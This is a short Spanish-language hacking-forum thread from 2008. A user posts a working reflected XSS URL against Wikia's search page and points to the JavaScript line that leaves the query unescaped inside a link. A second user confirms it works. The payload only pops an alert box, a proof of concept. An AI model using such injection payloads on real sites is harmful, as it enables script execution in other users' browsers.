Xss en Wikia search?

Thor · 8 Enero 2008, 15:04 PM

http://re.search.wikia.com/search#%22%3Elink%3C/a%3E%3CIFRAME%20SRC=%22javascript:alert('XSS');%22%3E%3C/IFRAME%3E

El problema creo que está por aquí:
http://re.search.wikia.com/search-a1.js

Código [Seleccionar]

$("sr-mini-content").innerHTML = 'We do not have a mini article about "'+q.escapeHTML()+'".  Improve the search results for everyone by <a href="http://search.wikia.com/index.php?title=Mini:'+q+'&action=edit">starting</a> this article!';

¿Se podría hacer sin lo de iframe? Directamente no he podido

NewLog · 9 Enero 2008, 23:20 PM

Qué grande es No-Script... hasta detecta los Xss...

Funciona.

Test Foro de elhacker.net SMF 2.1

Xss en Wikia search?

Thor

NewLog